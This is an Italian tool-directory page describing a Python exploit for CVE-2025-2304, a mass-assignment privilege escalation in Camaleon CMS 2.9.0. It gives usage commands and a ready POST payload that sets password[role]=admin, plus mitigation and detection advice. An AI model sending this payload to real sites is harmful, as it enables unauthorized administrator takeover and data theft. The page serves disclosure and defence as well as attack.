Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-2304 — Questo script Python sfrutta una vulnerabilità critica di mass assignment in Camaleon CMS versione 2.9.0, consentendo a qualsiasi utente registrato di elevare i propri privilegi fino a quelli di amministratore. | Kitploit
Strumenti/GitHubGitHub/csuribird/cve-2025-2304
Autenticazione e AutorizzazioneEscalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingConfigurazione ErrataApprendimento e Formazione
GitHubcsuribird/cve-2025-2304

CVE-2025-2304

Questo script Python sfrutta una vulnerabilità critica di mass assignment in Camaleon CMS versione 2.9.0, consentendo a qualsiasi utente registrato di elevare i propri privilegi fino a quelli di amministratore.

516 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

CVE-2025-2304 - Camaleon CMS 2.9.0 - Exploit di Escalation dei Privilegi

Panoramica

Questo script Python sfrutta una vulnerabilità critica di mass assignment in Camaleon CMS versione 2.9.0, consentendo a qualsiasi utente registrato di elevare i propri privilegi ad amministratore.

Dettagli della Vulnerabilità

  • CVE: CVE-2025-2304 - Mass Assignment in UsersController#updated_ajax
  • Versione Affetta: Camaleon CMS 2.9.0
  • Gravità: Critica
  • Vettore: Il metodo permit! nell'azione updated_ajax consente il passaggio di tutti i parametri senza filtri, incluso il parametro role

Come Funziona l'Exploit

  1. Autenticazione: Lo script accede come utente registrato normale
  2. Sfruttamento: Invia una richiesta POST a /admin/users/[id]/updated_ajax con un payload malevolo: (Nello script ho usato l'id 5 poiché di solito è quello assegnato automaticamente. Potrebbe essere necessario cambiarlo.)
    • password[role]=admin - Questo parametro dovrebbe essere filtrato, ma non lo è a causa di permit!
    • password[password] e password[password_confirmation] - Aggiorna la password dell'utente (Quando un utente normale con ruolo client aggiorna il proprio profilo, tecnicamente è user[role]=client, ma poiché qui stiamo sfruttando la vulnerabilità derivante dalla funzionalità change password, sarà password[role]=admin.)
  3. Escalation dei Privilegi: Il ruolo dell'utente viene cambiato da utente normale ad amministratore
  4. Verifica: Lo script tenta di accedere a endpoint riservati agli amministratori per confermare il successo

Installazione

root@kitploit:~
pip install -r requirements.txt

Utilizzo

root@kitploit:~
python camaleon_cms_privilege_escalation.py --url http://target-cms.com --username regularuser --password userpassword

Parametri Opzionali

  • --new-password: Imposta una nuova password durante lo sfruttamento (per impostazione predefinita usa la password corrente)

Esempio

root@kitploit:~
python camaleon_cms_privilege_escalation.py \
    --url http://192.168.1.100 \
    --username testuser \
    --password testpass123 \
    --new-password newadminpass

Dettagli Tecnici

Posizione del Codice Vulnerabile

La vulnerabilità è presente nel metodo updated_ajax del UsersController:

root@kitploit:~
def updated_ajax
  # Codice vulnerabile - usa permit! invece del filtraggio specifico dei parametri
  @user.update(params.require(:user).permit!)
  # Questo consente il mass assignment di QUALSIASI parametro, incluso role
end

Payload Malevolo

root@kitploit:~
POST /admin/users/[id]/updated_ajax
Content-Type: application/x-www-form-urlencoded

password[password]=newpass123&password[password_confirmation]=newpass123&password[role]=admin&_method=patch

Risposta Attesa

root@kitploit:~
{
  "success": true,
  "message": "User updated successfully"
}

Impatto

  • Escalation dei Privilegi: Gli utenti normali possono ottenere l'accesso come amministratori
  • Compromissione Totale del Sistema: L'accesso amministrativo consente il controllo completo del CMS
  • Violazione dei Dati: Accesso a tutti i dati degli utenti e ai contenuti
  • Persistenza: Possibilità di creare backdoor e mantenere l'accesso

Mitigazione

Per gli Sviluppatori

Sostituire il vulnerabile metodo permit! con un filtraggio esplicito dei parametri:

root@kitploit:~
def updated_ajax
  @user.update(params.require(:user).permit(:password, :password_confirmation, :email))
  # Escludere esplicitamente: il parametro role
end

Per gli Amministratori di Sistema

  1. Aggiornare a una versione corretta di Camaleon CMS (2.9.1)
  2. Implementare controlli di accesso basati sui ruoli
  3. Aggiungere validazione degli input e filtraggio dei parametri
  4. Monitorare tentativi sospetti di escalation dei privilegi

Disclaimer Legale

Questo script ha scopo esclusivamente educativo e per test di sicurezza autorizzati. Non utilizzare questo exploit su sistemi di cui non si è proprietari o per i quali non si dispone di esplicita autorizzazione al test. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.

Rilevamento

I team di sicurezza possono rilevare i tentativi di sfruttamento monitorando:

  • Richieste POST a /admin/users/[id]/updated_ajax con il parametro password[role]
  • Cambiamenti inattesi di ruolo negli account utente
  • Pattern di escalation dei privilegi nei log di audit

Riferimenti

  • Documentazione sulla vulnerabilità Mass Assignment
  • Linee guida sulla sicurezza di Ruby on Rails
  • Advisory di sicurezza di Camaleon CMS
Scarica lo strumento